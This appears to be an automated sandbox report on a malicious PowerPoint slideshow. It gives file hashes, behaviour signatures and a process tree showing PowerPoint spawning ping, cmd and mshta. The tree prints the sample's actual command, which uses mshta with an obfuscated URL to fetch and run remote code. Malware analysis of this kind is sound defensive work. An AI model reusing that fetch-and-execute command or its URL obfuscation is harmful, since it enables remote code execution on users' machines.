Overview

overview

10

Static

static

8

1622576d_b...is.pps

windows7_x64

10

1622576d_b...is.pps

windows10_x64

10

Analysis

  • max time kernel
    119s
  • max time network
    138s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    05-05-2021 15:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1622576d_by_Libranalysis.pps

  • Size

    707KB

  • MD5

    1622576dd5cc993ae42f5c35b4b9ed2f

  • SHA1

    6071d99ea546e6d74656bf8114bcd7a663eb84ba

  • SHA256

    c1110237231589eb7cb435f52783b0eb917baca45b075e8f78d5b78a0fe66688

  • SHA512

    6d9501e71c7095050b1bd8a2ca467f926b008c6f36c17ce673b012730e3fc33dc29fd513e875635e6fc6cc446e57a0572477f82df038d4d81870a78447a29804

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 7 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\1622576d_by_Libranalysis.pps" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3876
    • C:\Windows\SYSTEM32\ping.exe
      ping
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:696
    • C:\Windows\SYSTEM32\ping.exe
      ping
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:2744
    • C:\Windows\SYSTEM32\ping.exe
      ping
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:3004
    • C:\Windows\SYSTEM32\ping.exe
      ping
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:1540
    • C:\Windows\SYSTEM32\ping.exe
      ping
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:2368
    • C:\Windows\SYSTEM32\ping.exe
      ping
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:2716
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c mshta http://1230948%[email protected]/jasidjijasdasdjjj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\system32\mshta.exe
        mshta http://1230948%[email protected]/jasidjijasdasdjjj
        3⤵
        • Blocklisted process makes network request
        PID:792
    • C:\Program Files\Microsoft Office\Root\Office16\winword.exe
      winword.exe
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:4256

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
    MD5

    597c3953c957a3a9037b93f637233fb6

    SHA1

    640c81f41bb10f016a893c595e253f1b2dc57fc3

    SHA256

    12521c0f1e9afbc0a21eb8fef2c408ee5ffe1e403b7d14c7c256b3b5bb4705a2

    SHA512

    74f788d321b686d9a0fd83fa55ddd5a3e5e3293b30ad79881d9cce607daddeed1ace45cbfede1822b35e765b5685717f1fc029b2c0c7ad91ecd1feb3ea3add62

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
    MD5

    d0b70c2ed14cbe6bbc6c605730225bb8

    SHA1

    3035b223c4eb3733ea1fefb3080d1682c2a4dda5

    SHA256

    303add18cb4fcbd903d39c6e05263dfddccdb9c45f3a5b2915d567ad54fc807e

    SHA512

    eee5d1476bce2321d7143fe7c06726a6c997711c2f2bc8ae70631be586f0814846c3f451df43052f67fd2bd66dc88ec080d358c434aff96664348cf4412a0d00

    Download Submit
  • memory/696-179-0x0000000000000000-mapping.dmp
    Download
  • memory/792-186-0x0000000000000000-mapping.dmp
    Download
  • memory/1540-183-0x0000000000000000-mapping.dmp
    Download
  • memory/2032-185-0x0000000000000000-mapping.dmp
    Download
  • memory/2368-184-0x0000000000000000-mapping.dmp
    Download
  • memory/2716-180-0x0000000000000000-mapping.dmp
    Download
  • memory/2744-181-0x0000000000000000-mapping.dmp
    Download
  • memory/3004-182-0x0000000000000000-mapping.dmp
    Download
  • memory/3876-114-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3876-123-0x00007FFDF5650000-0x00007FFDF7545000-memory.dmp
    Filesize

    31.0MB

    Download
  • memory/3876-122-0x00007FFDFAB90000-0x00007FFDFBC7E000-memory.dmp
    Filesize

    16.9MB

    Download
  • memory/3876-119-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3876-118-0x00007FFDFDCB0000-0x00007FFDFF88D000-memory.dmp
    Filesize

    27.9MB

    Download
  • memory/3876-117-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3876-116-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3876-115-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4256-187-0x0000000000000000-mapping.dmp
    Download